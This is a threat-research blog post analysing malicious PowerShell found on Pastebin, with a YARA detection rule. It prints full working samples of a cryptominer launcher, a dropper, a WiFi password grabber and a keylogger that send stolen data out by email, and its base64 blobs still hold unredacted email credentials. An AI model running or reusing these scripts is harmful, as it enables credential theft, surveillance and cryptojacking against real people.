Sketchy Powershell Scripts on Pastebin

Sketchy Powershell Scripts on Pastebin

2021, Aug 18    

A project that I have been running on and off since 2019 is a Pastebin scraper looking for various types of threats. One of the most common and consistent threats I see is malicous PowerShell scripts.

Detection

So far I only use three different substrings to find malicous scripts as shown in the Yara rule below.

rule Malicious_Powershell
{
		meta:
			author = "Jon Lein"
			date = "10/22/2020"
			description = "Things in PowerShell scripts that have the potential to do harm."
		strings:
			$Hidden_Window = "-WindowStyle hidden"
			$Execution_policy = "-ExecutionPolicy ByPass"
			$Download_String = "DownloadString("

		condition:
			$Hidden_Window or $Execution_policy or $Download_String
}

1) “-WindowStyle hidden” will allow the script to execute without displaying a window. This makes any attacks slightly more hidden from the user increasing the odds that the script runs long enough for the attacker to succede.

2) “-ExecutionPolicy ByPass” tries to make sure there aren’t any policies in place to prevent them from executing their script. There could be a policy in place making sure that scripts have to be digitally signed before they can be executed.

3) “DownloadString(“ simply allows an attacker to pass a URL and download content from the Internet. Often this will be another script to execute inside the Powershell script.

CryptoJacking

CryptoJacking is a technique for attackers to hijack resources on a victim computer to use for mining cryptocurrency. This script downloads software called xmrig directly from GitHub. It simply downloads a .bat file and passes a Monero wallet to start mining. This technique appears very often on my IOT honeypots so I’m not surprised to see it addapted here for Windows machines.

powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile '42w1byK8h8e9AWw6S3nDK2VivKNW5REkUagtQCUskV83TngCpkqDkMuU79g7q1Q4TCPmr6am81wh2DH3GsGtkbcFKM5kUov'; Remove-Item -Force $tempfile"

Droppers

A dropper is a stage in malware that simply downloads a new executable or code onto a victim computer. This GitHub link is dead so I’m not sure what they are trying to accomplish.

powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://github.com/rq6/1/raw/master/Client.exe',\"$env:temp\Client.exe\"); Start-Process \"$env:temp\Client.exe\""

Wifi Grabber and other Redteam Scripts

This style of script is one of the most common patterns I see with PowerShell scripts. This script echos a string into a file, decrypts in with Base64, and executes it.

echo bmV0c2ggd2xhbiBleHBvcnQgcHJvZmlsZSBrZXk9Y2xlYXIKCmVjaG8gIldpZmkgUGFzc3dvcmQgR3JhYmJlciBieSBTYWxlaCBJLiIgPiB3aWZpcGFzcy50eHQKZGlyICoueG1sIHwlIHsKJHhtbD1beG1sXSAoZ2V0LWNvbnRlbnQgJF8pCiRhPSAiPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PWByYG4gU1NJRCA9ICIrJHhtbC5XTEFOUHJvZmlsZS5TU0lEQ29uZmlnLlNTSUQubmFtZSArICJgcmBuIFBBU1MgPSAiICskeG1sLldMQU5Qcm9maWxlLk1TTS5TZWN1cml0eS5zaGFyZWRLZXkua2V5bWF0ZXJpYWwKCk91dC1GaWxlIHdpZmlwYXNzLnR4dCAtQXBwZW5kIC1JbnB1dE9iamVjdCAkYQoKfQoKCiRTTVRQU2VydmVyID0gJ3NtdHAuZ21haWwuY29tJwoKCiAgJFNNVFBJbmZvID0gTmV3LU9iamVjdCBOZXQuTWFpbC5TbXRwQ2xpZW50KCRTbXRwU2VydmVyLCA1ODcpCgoKICAkU01UUEluZm8uRW5hYmxlU3NsID0gJHRydWUKCgogICRTTVRQSW5mby5DcmVkZW50aWFscyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5OZXR3b3JrQ3JlZGVudGlhbCgnYWxpZW5leGUxOTk3MDJAZ21haWwuY29tJywgJ0FsaWVuRXhlJykKCgogICRSZXBvcnRFbWFpbCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5NYWlsLk1haWxNZXNzYWdlCgoKICAkUmVwb3J0RW1haWwuRnJvbSA9ICdtYW51ZXl5eUBnbWFpbC5jb20nCgoKICAkUmVwb3J0RW1haWwuVG8uQWRkKCdtYW51ZWxzY2h1bHpAaG90bWFpbC5jaCcpCgoKICAkUmVwb3J0RW1haWwuU3ViamVjdCA9ICdXSUZJIFBhc3N3b3J0IExpc3RlIHZvbiAnICsgJGVudjpVc2VyTmFtZQoKCiAgJFJlcG9ydEVtYWlsLkJvZHkgPSAnRGllc2UgTmFjaHJpY2h0IHd1cmRlIG1pdCBlaW5lbSBNb2RpZml6aWVydGVuIFVTQi1TdGljayBnZXNlbmRldCcKCgogICRSZXBvcnRFbWFpbC5BdHRhY2htZW50cy5BZGQoJ3dpZmlwYXNzLnR4dCcpCgoKICAkU01UUEluZm8uU2VuZCgkUmVwb3J0RW1haWwpCgpybSAqLnhtbCAtRm9yY2UKcm0gdy50eHQgLUZvcmNlCnJtIHcuUFMxIC1Gb3JjZQpSZW1vdmUtSXRlbVByb3BlcnR5IC1QYXRoICdIS0NVOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxFeHBsb3JlclxSdW5NUlUnIC1OYW1lICcqJyAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQo= > w.txt

certutil -decode w.txt w.PS1

powershell  -windowstyle hidden -ExecutionPolicy ByPass  -File w.PS1

Decoded the script looks like this. It is designed to grab the SSID and password for a WIFI network, and exfiltrate the data through e-mail. These scripts often use e-mail to exfiltrate, but that requires an email address and password that is often hardcoded into the script. I redacted those for this post, but have collected quite the list of credientals from scripts like these.

netsh wlan export profile key=clear

echo "Wifi Password Grabber by Saleh I." > wifipass.txt
dir *.xml |% {
$xml=[xml] (get-content $_)
$a= "========================================`r`n SSID = "+$xml.WLANProfile.SSIDConfig.SSID.name + "`r`n PASS = " +$xml.WLANProfile.MSM.Security.sharedKey.keymaterial

Out-File wifipass.txt -Append -InputObject $a

}


$SMTPServer = 'smtp.gmail.com'


  $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)


  $SMTPInfo.EnableSsl = $true


  $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('<REDACTED>', '<REDACTED>')


  $ReportEmail = New-Object System.Net.Mail.MailMessage


  $ReportEmail.From = <REDACTED>


  $ReportEmail.To.Add('<REDACTED>')


  $ReportEmail.Subject = 'WIFI Passwort Liste von ' + $env:UserName


  $ReportEmail.Body = 'Diese Nachricht wurde mit einem Modifizierten USB-Stick gesendet'


  $ReportEmail.Attachments.Add('wifipass.txt')


  $SMTPInfo.Send($ReportEmail)

rm *.xml -Force
rm w.txt -Force
rm w.PS1 -Force
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

Keyloggers

Keyloggers are a type of malware used to record keystrokes made by a user. They can be used to collect credientals to comprimise accounts. This one follows the same pattern as the WIFI password grabber by decoding base64 before executing the PowerShell script.

echo JGVuY3J5cHRVPSIwMTAwMDAwMGQwOGM5ZGRmMDExNWQxMTE4YzdhMDBjMDRmYzI5N2ViMDEwMDAwMDBiY2NmYmIyOTdlZTQ3MzRhYTBhYTg0Yjg4MzVmNzMxZTAwMDAwMDAwMDIwMDAwMDAwMDAwMTA2NjAwMDAwMDAxMDAwMDIwMDAwMDAwNTI2YmU0MDRjODQ0MTczODA3OGUwY2YzODBmYjc3ODk5MzNjOGM1MjZiMTk2ZDUwNmU0NWQ4ZDk5MzczMTRhZDAwMDAwMDAwMGU4MDAwMDAwMDAyMDAwMDIwMDAwMDAwYzY2MTYzZTc1NjA1NTdmZTAxMGM5NjY2ZGI2NTljYjQ2NWJkYjNmZDE2ZDdkODgxMDYxZmNiYTdhOTczZjJhYTcwMDAwMDAwNTA2NDZhMGQ5NDAxZDZhZWIyMGQxZjY5ZTA0ZjA3ZmE3YWI5NjZjNjRkZDhmZDZhZTlkZmQzOTlhNDNmMTEyOGMzNTY1MjRlNWZlYTI2NTZhM2EwNjg5YzQzZTE2NWQ0MDc1MzhjODZiOGM0NDdkYTdmNzUzNmZjYWQ1YzkyOTU4ZDUxZTEyMzY1NzBhMTRjMzJlYjkzNzRkMDYzZDU2ZDMzNmY4M2Q3MDJmNzlhM2Y0N2JlNWFmZmIzNWE2YTc0YzE2YWJjOGI0ZWNiMjQyMTFlN2E2NjMxNzE3ZTU5ZDA0MDAwMDAwMDIwZjQxZTNjODllYTY2ZjQ3YjhjN2E0M2MyMGFlZjA5ODdlNGM1YjAyOTk4NzBlZDNkOWE3Y2Q2MTY4NDhmZDljYTM1ZThlM2QyZDY5MmEwYTg5NTYxYmM0M2I1ZTg1ZDk5NWE0ZTE0NDY2ZWExN2MxODRmYWJlZTZhYTZhM2Y3InxDb252ZXJ0VG8tU2VjdXJlU3RyaW5nOyR4PSJKd0JKQUVFQVRRQktBRlVBVXdCVUFFTUFUd0JPQUVZQVZRQlRBRWtBVGdCSEFGa0FUd0JWQUZRQVNBQkpBRk1BUVFCREFFTUFUd0JWQUU0QVZBQkpBRk1BVGdCUEFGWUFRUUJNQUZVQVJRQlVBRThBVFFCRkFDY0EiOyRzdHJVPVtSdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6UHRyVG9TdHJpbmdBdXRvKFtSdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6U2VjdXJlU3RyaW5nVG9CU1RSKCgoJGVuY3J5cHRVKSkpKTskRnJvbT1wb3dlcnNoZWxsIC1lbmNvZGVkQ29tbWFuZCAkc3RyVTskc3RyPSJKd0JKQUVFQVRRQktBRlVBVXdCVUFFTUFUd0JPQUVZQVZRQlRBRWtBVGdCSEFGa0FUd0JWQUZRQVNBQkpBRk1BUVFCREFFTUFUd0JWQUU0QVZBQkpBRk1BVGdCUEFGWUFRUUJNQUZVQVJRQlVBRThBVFFCRkFDY0EiCiRlbmNyeXB0UD0iMDEwMDAwMDBkMDhjOWRkZjAxMTVkMTExOGM3YTAwYzA0ZmMyOTdlYjAxMDAwMDAwYmNjZmJiMjk3ZWU0NzM0YWEwYWE4NGI4ODM1ZjczMWUwMDAwMDAwMDAyMDAwMDAwMDAwMDEwNjYwMDAwMDAwMTAwMDAyMDAwMDAwMGFkNGU5NWFlODliNDQ4OTNkMDkyNjUwNTY3YWE5OWQ1YjkzZjQ2ZTBkMTk3ZmM4MWZkNzc4ZjNlMDg1MWE2ODMwMDAwMDAwMDBlODAwMDAwMDAwMjAwMDAyMDAwMDAwMGRmYWI4Y2Y4ZmJjYjE3ZGEzMjU3N2Y5YzhhZTdlNjVmZWRmNDA4Mjc1MjFjNmZhYjcxZjY0MzI4ODY3YzM1MDI3MDAwMDAwMDVhNDEyYTJiMTUyYzY0NzRmNzlhNDhlZTY2MWM5YzZmMDJjYTM2MTA4ZGNhYTdlMmMzNjU4ZDA4MGI0NzAxMzdhNzhiY2QzM2YxZTQxODZlY2Y0ZTE0YTcyODQ0OTk3NGY2MjE1NjRhNzNiOGY3MjMyN2FkN2VhMDVlNGU0ZjhkM2VkYWNkNjY2MjU1MGM2Mjc1YTAzMDg2ZmI1ZTE3Y2U0MmIyNWMyNTM2YWU4NTY4ZjIzMzMzZTUxMzRlZDVjYjBmMDg0MTgzYWQ1NGQ0ZGU3YjU5ZWM4ODAzM2JiOGJkNDAwMDAwMDBlZDFmYTcxNzkyNmM3Njk1ZjRiZjRmNGQ1YjU4ZjQ1M2Y2OGI3MjU1YTE3NjVhMWU2NTU3NzZiMmNhODhmYTAxNzJjMTgxNWY3ZWFlZjlmZTQzM2RmODc0OTk0ZDkwZjdkZDljYmNlNTMwZGQ4NWY1ODhiZTlkMWExZTA0ZTEwOCJ8Q29udmVydFRvLVNlY3VyZVN0cmluZzskeT0iSndCVUFFZ0FTUUJUQUVrQVV3QktBRlVBVXdCVUFFSUFWUUJPQUVNQVNBQlBBRVlBUndCSkFFSUFRZ0JGQUZJQVNRQlRBRWdBSndBPSI7JHN0clA9W1J1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpQdHJUb1N0cmluZ0F1dG8oW1J1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpTZWN1cmVTdHJpbmdUb0JTVFIoKCgkZW5jcnlwdFApKSkpOyRQYXNzPXBvd2Vyc2hlbGwgLWVuY29kZWRDb21tYW5kICRzdHJQOyRwYXNzdz0iSndCSkFFRUFUUUJLQUZVQVV3QlVBRU1BVHdCT0FFWUFWUUJUQUVrQVRnQkhBRmtBVHdCVkFGUUFTQUJKQUZNQVFRQkRBRU1BVHdCVkFFNEFWQUJKQUZNQVRnQlBBRllBUVFCTUFGVUFSUUJVQUU4QVRRQkZBQ2NBIgokUnVuVGltZT0xNQokSW5pdD0xCiRUbz0iYXpoYXIwOGtoYW5AbWFpbC5jb20iCiRTdWJqZWN0PSJTeXN0ZW0gTG9nZ2VkIG9mICIrJGVudjpVU0VSTkFNRTsKJGJvZHk9IlN5c3RlbSBMb2dnZWQgYXMgb2YgIiskU3RhcnRUaW1lOyRib2R5CiRTTVRQU2VydmVyPSJzbXRwLm1haWwuY29tIjskU01UUFBvcnQ9IjU4NyIKJGNyZWRlbnRpYWxzID0gbmV3LW9iamVjdCBNYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNDcmVkZW50aWFsICRGcm9tLCAoJFBhc3MgfCBDb252ZXJ0VG8tU2VjdXJlU3RyaW5nIC1Bc1BsYWluVGV4dCAtRm9yY2UpCiNHb29kbHVjayBIYWNraW5nIHRoaXMuLiEKJE15RW1haWxVc2VybmFtZSA9ICJnQUFBQUFCZUQ5Qkdyd1h1UDYtLUZfQ1M3eUF0Z3M3S0REUGIwb2s2Z2VBVWMyZ2JPTUU0VWt3a003aVV4WGIzZHRzR2FaSzZ4elVWdk1FNTFLejFnc3NzUGlybnNYNFBaZzFDbUJwMmx3RC1MLTQ3OUp3RUNzST0nMTIzIgokTXlFbWFpbFBhc3N3b3JkID0gImdBQUFBQUJlRDlDX0huZGIzakRzUjdIVFp0d2cyWFMtcFc5TzF3a1VZd0xRcDBNYkFSOVhvTUNWUEJHMk1fZGtRaGpVUndrU3hfdTk0T0RvQUt6bm1iS2d6V0VmX3BpNjA3WXRiN1ozanJZMjJhNk1SY0Etd0hzPScxMjMiCiRTdGFydFRpbWUgPSBHZXQtRGF0ZQokRW5kVGltZSA9ICRTdGFydFRpbWUuYWRkbWludXRlcygkUnVuVGltZSkKCiNjb2RlOiBwcm9mZXhlcgpmdW5jdGlvbiBTeXN0ZW1Mb2dnZXIoJFBhdGg9IkM6XHg2NFxzeXN0ZW0zMi50eHQiKSAKewogICMgU2lnbmF0dXJlcyBmb3IgQVBJIENhbGxzCiAgJHNpZ25hdHVyZXMgPSBAJwpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8sIEV4YWN0U3BlbGxpbmc9dHJ1ZSldIApwdWJsaWMgc3RhdGljIGV4dGVybiBzaG9ydCBHZXRBc3luY0tleVN0YXRlKGludCB2aXJ0dWFsS2V5Q29kZSk7IApbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8pXQpwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgR2V0S2V5Ym9hcmRTdGF0ZShieXRlW10ga2V5c3RhdGUpOwpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8pXQpwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgTWFwVmlydHVhbEtleSh1aW50IHVDb2RlLCBpbnQgdU1hcFR5cGUpOwpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8pXQpwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgVG9Vbmljb2RlKHVpbnQgd1ZpcnRLZXksIHVpbnQgd1NjYW5Db2RlLCBieXRlW10gbHBrZXlzdGF0ZSwgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlciBwd3N6QnVmZiwgaW50IGNjaEJ1ZmYsIHVpbnQgd0ZsYWdzKTsKJ0AKCiAgIyBsb2FkIHNpZ25hdHVyZXMgYW5kIG1ha2UgbWVtYmVycyBhdmFpbGFibGUKICAkQVBJID0gQWRkLVR5cGUgLU1lbWJlckRlZmluaXRpb24gJHNpZ25hdHVyZXMgLU5hbWUgJ1dpbjMyJyAtTmFtZXNwYWNlIEFQSSAtUGFzc1RocnUKICAgIAogICMgY3JlYXRlIG91dHB1dCBmaWxlCiAgJG51bGwgPSBOZXctSXRlbSAtUGF0aCAkUGF0aCAtSXRlbVR5cGUgRmlsZSAtRm9yY2UKCiAgdHJ5CiAgewoKICAgICMgY3JlYXRlIGVuZGxlc3MgbG9vcC4gV2hlbiB1c2VyIHByZXNzZXMgQ1RSTCtDLCBmaW5hbGx5LWJsb2NrCiAgICAjIGV4ZWN1dGVzIGFuZCBzaG93cyB0aGUgY29sbGVjdGVkIGtleSBwcmVzc2VzCiAgICAkUnVubmVyID0gMAoJd2hpbGUgKCRSdW5UaW1lICAtZ2UgJFJ1bm5lcikgewoJd2hpbGUgKCRFbmRUaW1lIC1nZSAkVGltZU5vdykgewogICAgICBTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDQwCiAgICAgIAogICAgICAjIHNjYW4gYWxsIEFTQ0lJIGNvZGVzIGFib3ZlIDgKICAgICAgZm9yICgkYXNjaWkgPSA5OyAkYXNjaWkgLWxlIDI1NDsgJGFzY2lpKyspIHsKICAgICAgICAjIGdldCBjdXJyZW50IGtleSBzdGF0ZQogICAgICAgICRzdGF0ZSA9ICRBUEk6OkdldEFzeW5jS2V5U3RhdGUoJGFzY2lpKQoKICAgICAgICAjIGlzIGtleSBwcmVzc2VkPwogICAgICAgIGlmICgkc3RhdGUgLWVxIC0zMjc2NykgewogICAgICAgICAgJG51bGwgPSBbY29uc29sZV06OkNhcHNMb2NrCgogICAgICAgICAgIyB0cmFuc2xhdGUgc2NhbiBjb2RlIHRvIHJlYWwgY29kZQogICAgICAgICAgJHZpcnR1YWxLZXkgPSAkQVBJOjpNYXBWaXJ0dWFsS2V5KCRhc2NpaSwgMykKCiAgICAgICAgICAjIGdldCBrZXlib2FyZCBzdGF0ZSBmb3IgdmlydHVhbCBrZXlzCiAgICAgICAgICAka2JzdGF0ZSA9IE5ldy1PYmplY3QgQnl0ZVtdIDI1NgogICAgICAgICAgJGNoZWNra2JzdGF0ZSA9ICRBUEk6OkdldEtleWJvYXJkU3RhdGUoJGtic3RhdGUpCgogICAgICAgICAgIyBwcmVwYXJlIGEgU3RyaW5nQnVpbGRlciB0byByZWNlaXZlIGlucHV0IGtleQogICAgICAgICAgJG15Y2hhciA9IE5ldy1PYmplY3QgLVR5cGVOYW1lIFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXIKCiAgICAgICAgICAjIHRyYW5zbGF0ZSB2aXJ0dWFsIGtleQogICAgICAgICAgJHN1Y2Nlc3MgPSAkQVBJOjpUb1VuaWNvZGUoJGFzY2lpLCAkdmlydHVhbEtleSwgJGtic3RhdGUsICRteWNoYXIsICRteWNoYXIuQ2FwYWNpdHksIDApCgogICAgICAgICAgaWYgKCRzdWNjZXNzKSAKICAgICAgICAgIHsKICAgICAgICAgICAgIyBhZGQga2V5IHRvIGxvZ2dlciBmaWxlCiAgICAgICAgICAgIFtTeXN0ZW0uSU8uRmlsZV06OkFwcGVuZEFsbFRleHQoJFBhdGgsICRteWNoYXIsIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUpIAogICAgICAgICAgfQogICAgICAgIH0KICAgICAgfQoJICAkVGltZU5vdyA9IEdldC1EYXRlCiAgICB9CglzZW5kLW1haWxtZXNzYWdlIC1mcm9tICRmcm9tIC10byAkdG8gLXN1YmplY3QgJFN1YmplY3QgLWJvZHkgJGJvZHkgLUF0dGFjaG1lbnQgJFBhdGggLXNtdHBTZXJ2ZXIgJHNtdHBTZXJ2ZXIgLXBvcnQgJFNNVFBQb3J0IC1jcmVkZW50aWFsICRjcmVkZW50aWFscyAtdXNlc3NsCglSZW1vdmUtSXRlbSAtUGF0aCAkUGF0aCAtZm9yY2UKCX0KICB9CiAgZmluYWxseQogIHsKICAgICMgb3BlbiBsb2dnZXIgZmlsZSBpbiBOb3RlcGFkCglleGl0IDEKICB9Cn0KCiMgcmVjb3JkcyBhbGwga2V5IHByZXNzZXMgdW50aWwgdGltZSBpbiB0aGUgc2NyaXB0IGhhcyBiZWVuIHBhc3NlZCAKU3lzdGVtTG9nZ2VyCg== > e.txt

certutil -decode e.txt e.PS1

powershell -windowstyle hidden -ExecutionPolicy ByPass  -File e.PS1

This script is quite a bit more complicated than the other. It uses secure strings to make sure the password for the email address isn’t in clear text. It also needs to load several functions from user32.dll to capture and process the key strokes. The rest of the script keeps looping to record the keystrokes until a certain amount of time has passed. After that is sends the file containing all of the keys to the specified email address.

$encryptU="01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bccfbb297ee4734aa0aa84b8835f731e00000000020000000000106600000001000020000000526be404c8441738078e0cf380fb7789933c8c526b196d506e45d8d9937314ad000000000e8000000002000020000000c66163e7560557fe010c9666db659cb465bdb3fd16d7d881061fcba7a973f2aa7000000050646a0d9401d6aeb20d1f69e04f07fa7ab966c64dd8fd6ae9dfd399a43f1128c356524e5fea2656a3a0689c43e165d407538c86b8c447da7f7536fcad5c92958d51e1236570a14c32eb9374d063d56d336f83d702f79a3f47be5affb35a6a74c16abc8b4ecb24211e7a6631717e59d04000000020f41e3c89ea66f47b8c7a43c20aef0987e4c5b0299870ed3d9a7cd616848fd9ca35e8e3d2d692a0a89561bc43b5e85d995a4e14466ea17c184fabee6aa6a3f7"|ConvertTo-SecureString;$x="JwBJAEEATQBKAFUAUwBUAEMATwBOAEYAVQBTAEkATgBHAFkATwBVAFQASABJAFMAQQBDAEMATwBVAE4AVABJAFMATgBPAFYAQQBMAFUARQBUAE8ATQBFACcA";$strU=[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR((($encryptU))));$From=powershell -encodedCommand $strU;$str="JwBJAEEATQBKAFUAUwBUAEMATwBOAEYAVQBTAEkATgBHAFkATwBVAFQASABJAFMAQQBDAEMATwBVAE4AVABJAFMATgBPAFYAQQBMAFUARQBUAE8ATQBFACcA"
$encryptP="01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bccfbb297ee4734aa0aa84b8835f731e00000000020000000000106600000001000020000000ad4e95ae89b44893d092650567aa99d5b93f46e0d197fc81fd778f3e0851a683000000000e8000000002000020000000dfab8cf8fbcb17da32577f9c8ae7e65fedf40827521c6fab71f64328867c3502700000005a412a2b152c6474f79a48ee661c9c6f02ca36108dcaa7e2c3658d080b470137a78bcd33f1e4186ecf4e14a728449974f621564a73b8f72327ad7ea05e4e4f8d3edacd6662550c6275a03086fb5e17ce42b25c2536ae8568f23333e5134ed5cb0f084183ad54d4de7b59ec88033bb8bd40000000ed1fa717926c7695f4bf4f4d5b58f453f68b7255a1765a1e655776b2ca88fa0172c1815f7eaef9fe433df874994d90f7dd9cbce530dd85f588be9d1a1e04e108"|ConvertTo-SecureString;$y="JwBUAEgASQBTAEkAUwBKAFUAUwBUAEIAVQBOAEMASABPAEYARwBJAEIAQgBFAFIASQBTAEgAJwA=";$strP=[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR((($encryptP))));$Pass=powershell -encodedCommand $strP;$passw="JwBJAEEATQBKAFUAUwBUAEMATwBOAEYAVQBTAEkATgBHAFkATwBVAFQASABJAFMAQQBDAEMATwBVAE4AVABJAFMATgBPAFYAQQBMAFUARQBUAE8ATQBFACcA"
$RunTime=15
$Init=1
$To=<REDACTED>
$Subject="System Logged of "+$env:USERNAME;
$body="System Logged as of "+$StartTime;$body
$SMTPServer="smtp.mail.com";$SMTPPort="587"
$credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
#Goodluck Hacking this..!
$MyEmailUsername = "gAAAAABeD9BGrwXuP6--F_CS7yAtgs7KDDPb0ok6geAUc2gbOME4UkwkM7iUxXb3dtsGaZK6xzUVvME51Kz1gsssPirnsX4PZg1CmBp2lwD-L-479JwECsI='123"
$MyEmailPassword = "gAAAAABeD9C_Hndb3jDsR7HTZtwg2XS-pW9O1wkUYwLQp0MbAR9XoMCVPBG2M_dkQhjURwkSx_u94ODoAKznmbKgzWEf_pi607Ytb7Z3jrY22a6MRcA-wHs='123"
$StartTime = Get-Date
$EndTime = $StartTime.addminutes($RunTime)

#code: profexer
function SystemLogger($Path="C:\x64\system32.txt") 
{
  # Signatures for API Calls
  $signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
public static extern short GetAsyncKeyState(int virtualKeyCode); 
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@

  # load signatures and make members available
  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
    
  # create output file
  $null = New-Item -Path $Path -ItemType File -Force

  try
  {

    # create endless loop. When user presses CTRL+C, finally-block
    # executes and shows the collected key presses
    $Runner = 0
	while ($RunTime  -ge $Runner) {
	while ($EndTime -ge $TimeNow) {
      Start-Sleep -Milliseconds 40
      
      # scan all ASCII codes above 8
      for ($ascii = 9; $ascii -le 254; $ascii++) {
        # get current key state
        $state = $API::GetAsyncKeyState($ascii)

        # is key pressed?
        if ($state -eq -32767) {
          $null = [console]::CapsLock

          # translate scan code to real code
          $virtualKey = $API::MapVirtualKey($ascii, 3)

          # get keyboard state for virtual keys
          $kbstate = New-Object Byte[] 256
          $checkkbstate = $API::GetKeyboardState($kbstate)

          # prepare a StringBuilder to receive input key
          $mychar = New-Object -TypeName System.Text.StringBuilder

          # translate virtual key
          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)

          if ($success) 
          {
            # add key to logger file
            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
          }
        }
      }
	  $TimeNow = Get-Date
    }
	send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
	Remove-Item -Path $Path -force
	}
  }
  finally
  {
    # open logger file in Notepad
	exit 1
  }
}

# records all key presses until time in the script has been passed 
SystemLogger

Conclusion

PowerShell is a useful administrative tool, also making it a powerful tool for attackers. Many different types of attacks and malware techniques are possible with PowerShell as shown above. There are many I still have not collected such as social engineering scripts and ransomware that I have read about but still have not seen in the wild. PasteBin has gotten better with flagging and removing malicous content, so I’m not sure if encoded PowerShell through Pastebin will continue to be a viable technique.

Share on:
Twitter Facebook
# Malware # Pastebin # Python # Yara